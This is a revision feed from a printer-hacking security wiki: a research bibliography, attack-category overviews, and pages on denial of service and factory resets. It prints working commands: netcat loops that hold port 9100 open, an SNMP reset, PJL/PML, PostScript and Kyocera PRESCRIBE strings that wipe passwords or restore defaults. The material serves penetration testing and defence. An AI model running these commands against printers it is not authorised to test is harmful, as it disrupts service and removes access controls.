Hacking Printers - User contributions [en]

Bibliography

2017-01-15T17:27:48Z

92.227.58.56:

== Research by date ==

=== 2016 ===

'''Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices''' ([TBD PDF])
 by Jens Müller, Juraj Somorovsky, Vladislav Mladenov | Proof-of-concept code: [https://github.com/RUB-NDS/PRET]

'''PWN Xerox Printers (...again): About Hardware Attacks and Insecure Cloning''' ([https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PDF])
 by Peter Weidenbach, Raphael Ernst

=== 2014 ===

'''A Large-Scale Analysis of the Security of Embedded Firmwares''' ([https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-costin.pdf PDF])
 by Andrei Costin, Jonas Zaddach, Aurélien Francillon, and Davide Balzarotti | Video: [https://www.youtube.com/watch?v=5gf6mFz1rPM]

'''Hacking Canon Pixma Printers - Doomed Encryption''' ([http://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ HTML])
 by Michael Jordon

=== 2013 ===

'''Embedded Devices Security and Firmware Reverse Engineering''' ([http://s3.eurecom.fr/docs/bh13us_zaddach.pdf PDF])
 by Jonas Zaddach, Andrei Costin

'''Research Report on the Security of MFPs''' ([https://www.ipa.go.jp/security/jisec/apdx/documents/20130312report_E.pdf])
 by IPA Information-technology Promotion Agency, Japan

=== 2012 ===

'''PostScript: Danger Ahead?!'''
 by Andrei Costin | Slides: [https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf] | Video: [https://www.youtube.com/watch?v=ygcs0m5C9ZI]

=== 2011 ===

'''Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware'''
 by Ang Cui, Salvatore Stolfo | Slides: [http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf] | Video: [https://www.youtube.com/watch?v=njVv7J2azY8]

'''Printers gone Wild (PrintFS PJL filesystem)'''
 by Ben Smith | Video: [http://www.securitytube.net/video/1395] | Proof-of-concept code: [http://www.remote-exploit.org/articles/printfs/index.html]

'''From Printer to Pwnd: Leveraging Multifunction Printers During Penetration Testing'''
 by Deral Heiland | Slides: [http://foofus.net/goons/percx/defcon/P2PWND.pdf] | Video: [https://www.youtube.com/watch?v=PH4pTCmKgOg] | Proof-of-concept code: [https://github.com/percx/Praeda]

'''From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process''' ([http://foofus.net/goons/percx/Xerox_hack.pdf PDF])
 by Deral Heiland

=== 2010 ===

'''Hacking Printers for Fun and Profit'''
 by Andrei Costin | Slides: [http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf] | Video: [https://www.youtube.com/watch?v=R56ZXErKCeE]

'''Juste une imprimant?'''
 by NBS System | Slides: [http://www.ossir.org/jssi/jssi2010/1A.pdf]

=== 2006 ===

'''Hacking Network Printers''' ([http://www.irongeek.com/i.php?page=security/networkprinterhacking HTML])
 by Adrian Crenshaw (Irongeek)

=== 2002 ===

'''Understanding, Reversing, and Hacking HP Printers''' ([http://search.lores.eu/realicra/hp_slobo.htm HTML])
 by Slobotron

'''Printer Exploration (PFT and Hijetter, libPJL, ChaiPortScan, ChaiCrack)'''
 FtR of Phenoelit, FX of Phenoelit | Proof-of-concept code: [http://www.phenoelit.org/hp/index.html]

Print job access

2017-01-15T17:26:14Z

92.227.58.56:

The most valuable data found on printers is print jobs themselves. Even in a digital world, important documents are printed and kept as hard copies. In high security environments with encrypted hard disks and network traffic, printers might be the weakest link in the security chain.

''Currently, the following print job access categories are discussed in this wiki:''

* [[Print job retention]] – Obtaining documents printed by other users (the ultimate goal in printer hacking)
* [[Print job manipulation]] – Editing documents printed by other users (overlay graphics and further pranks)

Code execution

2017-01-15T17:22:19Z

92.227.58.56:

Any computer system may be prone to malicious code execution. Printers are no exception. While there are numerous potential attack vectors, two standard ways of importing foreign code are present in most of today's printers and MFPs by design: the ability to perform firmware updates and to install additional software packages. Furthermote, a short introduction to the danger of buffer overflows in embedded devices is given.

''Currently, the following techniques to achieve code execution are discussed in this wiki:''

* [[Buffer overflows]] – Smashing the stack based on unsanitized [[LPD]] and [[PJL]] input
* [[Firmware updates]] – Deploying malicious firmware through ordinary print jobs
* [[Software packages]] – Installing custom software on MFPs and printer devices

Information disclosure

2017-01-15T17:17:24Z

92.227.58.56:

Apart from print jobs, printers may contain further potentially sensitive information like passwords – not only for the device itself but sometimes even to the surrounding network environment.

''Currently, the following information disclosure categories are discussed in this wiki:''

* [[Memory access]] – Dumping the printer's NVRAM using proprietary PJL commands
* [[File system access]] – Performing file system operations using PostScript and PJL
* [[Credential disclosure]] – Obtaining PJL and PostScript passwords by brute-force attacks

Information disclosure

2017-01-15T17:15:59Z

92.227.58.56:

Apart from print jobs, printers may contain further potentially sensitive information like passwords – not only for the device itself but sometimes even to the network environment.

''Currently, the following information disclosure categories are discussed in this wiki:''

* [[Memory access]] – Dumping the printer's NVRAM using proprietary PJL commands
* [[File system access]] – Performing file system operations using PostScript and PJL
* [[Credential disclosure]] – Obtaining PJL and PostScript passwords by brute-force attacks

Privilege escalation

2017-01-15T17:13:04Z

92.227.58.56:

This category of attacks lists methods which can be used to bypass protection mechanisms or to extend the capabilities of an attacker.

''Currently, the following privilege escalation techniques are discussed in this wiki:''

* [[Factory defaults]] – Resetting the device to bypass protection mechanisms set by the user
* [[Accounting bypass]] – Breaking accounting and authentication in print servers (free copies!)
* [[Fax and Scanner]] – Extending the attackers capabilities (access to phone lines through MFPs!)

Privilege escalation

2017-01-15T17:10:02Z

92.227.58.56:

Privilege escalation

2017-01-15T17:09:47Z

92.227.58.56:

This category of attacks lists methods which can be used to bypass protection mechanisms or to extend the capabilities of and attacker.

''Currently, the following privilege escalation techniques are discussed in this wiki:''

* [[Factory defaults]] – Resetting the device to bypass protection mechanisms set by the user
* [[Accounting bypass]] – Breaking accounting and authentication in print servers (free copies!)
* [[Fax and Scanner]] – Extending the attackers capabilities, e.g. to access phone lines via MFPs

Denial of service

2017-01-15T16:53:40Z

92.227.58.56: Created page with "''' ''Rule of thumb: ‘If you can print, you can prevent others from printing’'' ''' Any network resource can be slowed down or even made completely unavailable to legitim..."

''' ''Rule of thumb: ‘If you can print, you can prevent others from printing’'' '''

Any network resource can be slowed down or even made completely unavailable to legitimate users by consuming its resources in terms of CPU/memory or bandwidth. Common techniques involve stressing services (for example, web servers and applications) or protocols on the network level (for example, [https://en.wikipedia.org/wiki/SYN_flood SYN flooding] or more advanced [https://en.wikipedia.org/wiki/Slowloris_%28computer_security%29 Slowloris] attacks). While those generic attacks work against network printers too, this wiki focuses on printer-specific denial of service attacks and gives a brief overview of methods to cause loss of availability and show that this can be accomplished by very simple means.

While the business impact of unavailable printers might be limited in most offices, time-critical industries like overnight digital printing companies may suffer financial loss even for short-term outages.


''Currently, the following denial of service techniques are discussed in this wiki:''

* [[Transmission channel]] – Blocking others by keeping a connection to port 9100/tcp open
* [[Document processing]] – Using PostScript and PJL to break printing functionality
* [[Physical damage]] – Exhausting the NVRAM's limited number of write cycles

Print job access

2017-01-15T16:38:07Z

92.227.58.56:

''Currently, the following print job access categories are discussed in this wiki:''

* [[Print job retention]] – Obtaining documents printed by other users (the ultimate goal in printer hacking)
* [[Print job manipulation]] – Editing documents printed by other users (overlay graphics and further pranks)

Code execution

2017-01-15T16:37:00Z

92.227.58.56:

''Currently, the following techniques to achieve code execution are discussed in this wiki:''

* [[Buffer overflows]] – Smashing the stack based on unsanitized [[LPD]] and [[PJL]] input
* [[Firmware updates]] – Deploying malicious firmware through ordinary print jobs
* [[Software packages]] – Installing custom software on MFPs and printer devices

Information disclosure

2017-01-15T16:36:21Z

92.227.58.56:

''Currently, the following information disclosure categories are discussed in this wiki:''

* [[Memory access]] – Dumping the printer's NVRAM using proprietary PJL commands
* [[File system access]] – Performing file system operations using PostScript and PJL
* [[Credential disclosure]] – Obtaining PJL and PostScript passwords by brute-force attacks

Print job access

2017-01-15T16:35:56Z

92.227.58.56:

''Currently, the following techniques to access print jobs are discussed in this wiki:''

* [[Print job retention]] – Obtaining documents printed by other users (the ultimate goal in printer hacking)
* [[Print job manipulation]] – Editing documents printed by other users (overlay graphics and further pranks)

Privilege escalation

2017-01-15T16:35:31Z

92.227.58.56:

''Currently, the following privilege escalation techniques are discussed in this wiki:''

* [[Factory defaults]] – Resetting the device to bypass protection mechanisms set by the user
* [[Accounting bypass]] – Breaking accounting and authentication in print servers (free copies!)
* [[Fax and Scanner]] – Extending the attackers capabilities, e.g. to access phone lines via MFPs

Code execution

2017-01-15T16:34:52Z

92.227.58.56: Created page with "''Currently, the following denial of service techniques are discussed in this wiki:'' * Buffer overflows – Smashing the stack based on unsanitized LPD and PJL i..."

''Currently, the following denial of service techniques are discussed in this wiki:''

* [[Buffer overflows]] – Smashing the stack based on unsanitized [[LPD]] and [[PJL]] input
* [[Firmware updates]] – Deploying malicious firmware through ordinary print jobs
* [[Software packages]] – Installing custom software on MFPs and printer devices

Information disclosure

2017-01-15T16:28:41Z

92.227.58.56: Created page with "''Currently, the following denial of service techniques are discussed in this wiki:'' * Memory access – Dumping the printer's NVRAM using proprietary PJL commands * F..."

''Currently, the following denial of service techniques are discussed in this wiki:''

* [[Memory access]] – Dumping the printer's NVRAM using proprietary PJL commands
* [[File system access]] – Performing file system operations using PostScript and PJL
* [[Credential disclosure]] – Obtaining PJL and PostScript passwords by brute-force attacks

Print job access

2017-01-15T16:28:26Z

92.227.58.56:

''Currently, the following denial of service techniques are discussed in this wiki:''

* [[Print job retention]] – Obtaining documents printed by other users (the ultimate goal in printer hacking)
* [[Print job manipulation]] – Editing documents printed by other users (overlay graphics and further pranks)

Print job access

2017-01-15T16:23:21Z

92.227.58.56: Created page with "''Currently, the following denial of service techniques are discussed in this wiki:'' * Print job retention]] – Obtaining documents printed by other users * Print job manip..."

''Currently, the following denial of service techniques are discussed in this wiki:''

* Print job retention]] – Obtaining documents printed by other users
* Print job manipulation]] – Editing documents printed by other users

Privilege escalation

2017-01-15T16:23:15Z

92.227.58.56: Created page with "''Currently, the following denial of service techniques are discussed in this wiki:'' * Factory defaults – Resetting the device to bypass protection mechanisms set by t..."

''Currently, the following denial of service techniques are discussed in this wiki:''

* [[Factory defaults]] – Resetting the device to bypass protection mechanisms set by the user
* [[Accounting bypass]] – Breaking accounting and authentication in print servers (free copies!)
* [[Fax and Scanner]] – Extending the attackers capabilities, e.g. to access phone lines via MFPs

Transmission channel

2017-01-15T15:55:10Z

92.227.58.56: Created page with "If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate the printing channel effe..."

If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate the printing channel effectively is blocked until a timeout is triggered, preventing legitimate users from printing. This trivial denial of service attack can be improved by setting a high timeout value with [[PJL]].

'''How to test for this attack?'''

Connecting to port 9100/tcp of a printer without closing the connection prevents most devices to accept new print jobs. Tests can be performed using the ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref> utility in a loop as shown below:

<syntaxhighlight lang=sh>
while true; do nc printer 9100; done
</syntaxhighlight>

A more advanced version of this DoS attack which sets a higher timeout is given below.

<syntaxhighlight lang=sh>
# get maximum timeout value with PJL
MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\
grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`"
# connect and set maximum timeout for current job with PJL
while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done
</syntaxhighlight>

While the PJL reference specifies a maximum timeout of 300 seconds <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-25</ref>, in practice maximum PJL timeouts may range from 15 to 2147483 seconds. Hence, this value is first retrieved be from the printer and then set in all further connections. The advantage of this approach is that the number of connections for an attacker to make is minimized while it is even harder for legitimate users to gain a free time slot (race condition) to deploy a print job. Note that even print jobs received from other printing channels like IPP or LPD are not processed anymore as long as the connection is kept open.

To check the PJL timeout settings for you printer, [[PRET]] can be used as follows:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> env timeout
TIMEOUT=15 [2 RANGE]
5
300

'''Who can perform this attack?'''

Anyone who can access port 9100/tcp of a printer device. Note that this can even be accomplished with [[cross-site printing]] techniques as long as the website used to enforce XHR connections is kept open.

----

Factory defaults

2017-01-15T15:39:56Z

92.227.58.56: /* PRESCRIBE */

Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article.

== SNMP ==

The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults.

'''How to test for this attack?'''

Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below:

$ snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6

'''Who can perform this attack?'''

Anyone who can send network packets to port 161/udp of the printer device.

== PML/PJL ==

In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below:

@PJL DMCMD ASCIIHEX="040006020501010301040106"

'''How to test for this attack?'''

On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> reset
printer:/> restart

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== PostScript ==

PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password.

Reset PostScript system parameters to factory defaults:

<syntaxhighlight lang=postscript>
<< /FactoryDefaults true >> setsystemparams
</syntaxhighlight>

Restart the PostScript interpreter and virtual memory:

<syntaxhighlight lang=postscript>
true 0 startjob systemdict /quit get exec
</syntaxhighlight>

'''How to test for this attack?'''

Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]:

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> reset
printer:/> restart

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== PRESCRIBE ==

For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: 

!R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password";
!R! ACNT "REST"; CMMT "Reset account code admin password";
!R! EGRE; CMMT "Reset the engine board to factory defaults";
!R! SIOP0,"RESET:0"; CMMT "Reset configuration settings";

'''How to test for this attack?'''

Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the commands above.

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

----